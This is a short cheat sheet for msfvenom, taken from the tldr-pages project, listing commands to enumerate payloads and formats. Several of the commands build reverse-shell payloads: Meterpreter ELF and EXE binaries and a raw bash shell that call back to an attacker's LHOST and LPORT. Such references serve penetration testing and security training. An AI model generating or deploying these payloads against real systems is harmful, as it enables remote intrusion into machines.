; This has been extracted from
; https://github.com/tldr-pages/tldr/blob/master/pages/common/msfvenom.md

% msfvenom, common

# List payloads
msfvenom -l payloads

# List formats
msfvenom -l formats

# Show payload options
msfvenom -p <payload> --list-options

# Create an ELF binary with a reverse TCP handler
msfvenom -p linux_x64_meterpreter_reverse_tcp LHOST=<local_ip> LPORT=<local_port> -f elf -o <path_to_binary>

# Create an EXE binary with a reverse TCP handler
msfvenom -p windows_x64_meterpreter_reverse_tcp LHOST=<local_ip> LPORT=<local_port> -f exe -o <path_to_binary.exe>

# Create a raw bash with a reverse TCP handler
msfvenom -p cmd_unix_reverse_bash LHOST=<local_ip> LPORT=<local_port> -f raw
